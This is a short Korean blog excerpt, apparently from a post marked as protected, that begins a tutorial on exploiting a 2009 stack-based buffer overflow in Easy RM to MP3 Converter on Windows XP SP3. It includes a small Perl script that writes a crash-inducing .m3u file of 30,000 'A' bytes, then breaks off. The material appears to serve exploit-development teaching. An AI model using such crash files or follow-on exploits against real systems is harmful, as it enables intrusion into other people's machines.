Hacking Arts

보호되어 있는 글입니다.

1.스택 기반 오버플로우 2009년 7월 17일 발표된 Easy Rm to MP3 Converter에 존재하는 취약점을 예로 explot을 작성해봅니다.이전에 발표된 취약점이라 CVE사이트를 돌아다니다가 취약점이 존재하는 배포판의 프로그램을 찾는데 성공하였고 그 프로그램을 설치한 뒤 문서에 맞게 실행하였습니다. 일단은 단순 BOF라 system의 공격방법과 공격방식은 동일합니다. 그리고 Win XP SP3에서 실행하였습니다. 일단 my $file = "crash.m3u"; my $junk = "\x41" x 30000; open($FILE, ">$file"); print $FILE "$junk"; close($FILE); print "m3u File Createed Successfully \n" 위의 p..